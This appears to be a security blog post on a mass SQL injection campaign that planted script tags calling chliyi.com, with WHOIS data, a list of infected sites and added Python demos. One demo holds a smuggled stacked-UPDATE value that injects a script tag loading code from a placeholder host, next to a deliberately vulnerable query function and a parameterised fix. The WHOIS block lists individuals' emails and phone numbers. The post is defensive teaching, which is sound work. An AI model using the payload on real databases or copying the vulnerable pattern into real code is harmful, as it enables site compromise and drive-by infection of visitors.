Reportedly, this launches some sort of ActiveX attack via obfuscated VBScript. This is another good reason not to use Internet Explorer: most other browsers do not support ActiveX and so are not vulnerable to this particular attack.
Unlike some other recent injection attacks, this one seems to use a legitimate domain called chliyi.com - unfortunately for the bad guys, the registration on the domain is going to run out pretty soon.
The IP address of the server is 218.30.96.87, which is not in the Spamhaus DROP list. That again suggests that chliyi.com might well be legitimate, just compromised. Bear in mind that DROP only lists netblocks hijacked or controlled by criminals, so a compromised host on an otherwise legitimate network would not appear there anyway.
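For anyone wanting to repeat that DROP check against other IP addresses turning up in these injections, here is an added example (my own code, not from the original post). The DROP file is plain text with one "CIDR ; SBL reference" per line and comment lines starting with a semicolon; the entries below are constructed from documentation address ranges and are not the real list, so the only thing the sample proves about 218.30.96.87 is that the lookup works.

```python
import ipaddress

# Constructed sample in the DROP file format. These ranges are documentation
# prefixes made up for the example, not entries from the real Spamhaus list.
SAMPLE_DROP = """\
; Spamhaus DROP List (constructed sample, not real data)
; Comment lines begin with a semicolon
192.0.2.0/24 ; SBL000001
198.51.100.0/22 ; SBL000002
203.0.113.0/24 ; SBL000003
"""


def parse_drop(text):
    """Return the networks in a DROP-format document, skipping comments and blanks."""
    nets = []
    for line in text.splitlines():
        # Everything after ';' is the SBL reference or a comment; keep only the CIDR.
        entry = line.split(";", 1)[0].strip()
        if entry:
            nets.append(ipaddress.ip_network(entry, strict=False))
    return nets


def drop_match(ip, nets):
    """Return the listed network covering ip, or None if it is not in the list."""
    addr = ipaddress.ip_address(ip)
    for net in nets:
        if addr in net:
            return net
    return None


if __name__ == "__main__":
    nets = parse_drop(SAMPLE_DROP)
    for ip in ("218.30.96.87", "198.51.100.77"):
        hit = drop_match(ip, nets)
        print(ip, "is listed in", hit) if hit else print(ip, "is not in the sample DROP list")
```

To run this against the real list, fetch the current DROP file from Spamhaus and pass its contents to parse_drop(); the format is the same. A "not listed" result is weak evidence on its own, for the reason given above.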
Domain Name.......... chliyi.com
Creation Date........ 2003-06-12 11:21:39
Registration Date.... 2003-06-12 11:21:39
Expiry Date.......... 2008-06-12 11:21:39
Organisation Name.... junrong shen
Organisation Address. dongxiaoqiao3-1-104
Organisation Address.
Organisation Address. suzhou
Organisation Address. 215006
Organisation Address. JS
Organisation Address. CN
Admin Name........... shen junrong
Admin Address........ dongxiaoqiao3-1-104
Admin Address........
Admin Address........ suzhou
Admin Address........ 215006
Admin Address........ JS
Admin Address........ CN
Admin Email.......... wzh@hisuzhou.com
Admin Phone.......... +86.51265678898
Admin Fax............ +86.51257306265
Tech Name............ zhihui wang
Tech Address......... suzhou
Tech Address.........
Tech Address......... suzhou
Tech Address......... 215021
Tech Address......... JS
Tech Address......... CN
Tech Email........... wzh@hisuzhou.com
Tech Phone........... +86.5169697639
Tech Fax............. +86.5167621807
Bill Name............ zhihui wang
Bill Address......... suzhou
Bill Address.........
Bill Address......... suzhou
Bill Address......... 215021
Bill Address......... JS
Bill Address......... CN
Bill Email........... wzh@hisuzhou.com
Bill Phone........... +86.5169697639
Bill Fax............. +86.5167621807
Name Server.......... dns22.hichina.com
Name Server.......... dns21.hichina.com
This is another attack that goes to show that "there is no such thing as a safe site". A scan of the Google results comes up with some interesting (and alarming) infected sites:
- forces.ca - Canadian military
- paramountcomedy.com - Paramount Comedy (Cable TV channel)
- kcsg.com - KCSG (Utah TV station)
- umnh.utah.edu - University of Utah
- digital.lib.ecu.edu - East Carolina University
- chapel.duke.edu - Duke University
- drdrew.com - Dr Drew (relationship advice)
- gisp.org - Global Invasive Species Program
- sciencescotland.org - Science Scotland (Royal Society of Edinburgh)
- moffitt.org - H. Lee Moffitt Cancer Center and Research Institute
- confetti.co.uk - Confetti (Wedding planning)
- buildabear.com - Build-a-Bear Workshop
- delluniversity.com - Dell
- trelleborg.com - Trelleborg AB (Polymer manufacturer)
This is not a comprehensive list of infected sites, and many of these sites will have been cleaned up.
If you are running a SQL server behind a web application, the rule is never to build queries by gluing user input into the SQL text: use parameterised queries (and validate inputs as well), or you will get attacked again and again.
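To make that concrete, here is an added example (my own code, not from the original post or any of the affected sites) of the vulnerable pattern beside the fix. It uses Python's sqlite3 module with constructed sample data; the injected tag points at a placeholder host, not the domain discussed above. Two assumptions are worth flagging: sqlite3's execute() refuses to run more than one statement, so the vulnerable version uses executescript() to stand in for a database driver that accepts a batch of statements (which is what a stacked "; UPDATE ..." injection needs), and the concatenation operator is SQLite's ||, where other databases use + or CONCAT().

```python
import sqlite3

# Constructed sample content, not taken from any real site.
SAMPLE_PAGES = [
    (1, "Home", "<p>Welcome</p>"),
    (2, "About", "<p>About us</p>"),
]

# Hypothetical injected tag; the host is a placeholder, not the domain in the post.
INJECTED_TAG = '<script src="http://injected.example/x.js"></script>'

# Hypothetical attacker-controlled value for an "id" parameter. The stacked UPDATE
# appends the tag to every row, which is the effect seen on the listed sites.
MALICIOUS_ID = "1; UPDATE pages SET body = body || '" + INJECTED_TAG + "';"


def make_db():
    """Create an in-memory database with the sample pages."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT, "
        "hits INTEGER NOT NULL DEFAULT 0)"
    )
    con.executemany("INSERT INTO pages (id, title, body) VALUES (?, ?, ?)", SAMPLE_PAGES)
    con.commit()
    return con


def record_hit_vulnerable(con, page_id):
    """Builds the statement by string concatenation, so the input is parsed as SQL.
    executescript() is used only because sqlite3.execute() rejects stacked statements;
    it emulates a driver that runs the whole batch (assumption, see lead-in)."""
    sql = "UPDATE pages SET hits = hits + 1 WHERE id = " + str(page_id)
    con.executescript(sql)


def record_hit_safe(con, page_id):
    """Parameterised: the value is bound, never parsed as SQL. An attacker's string
    simply fails to match any integer id and updates nothing."""
    con.execute("UPDATE pages SET hits = hits + 1 WHERE id = ?", (page_id,))
    con.commit()


def hits(con, page_id):
    """Return the hit counter for one page."""
    return con.execute("SELECT hits FROM pages WHERE id = ?", (page_id,)).fetchone()[0]


def injected_rows(con):
    """The check to run after an incident: which rows now carry a script tag?"""
    return [row[0] for row in con.execute("SELECT id FROM pages WHERE body LIKE '%<script%'")]


if __name__ == "__main__":
    con = make_db()
    record_hit_vulnerable(con, MALICIOUS_ID)
    print("vulnerable version, rows now carrying a script tag:", injected_rows(con))

    con = make_db()
    record_hit_safe(con, MALICIOUS_ID)
    print("parameterised version, rows carrying a script tag:", injected_rows(con))
```

The injected_rows() query is also a reasonable first pass when cleaning up: search every text column for `<script` and for the injected domain, then fix the query code before restoring content, since reinfection follows quickly otherwise.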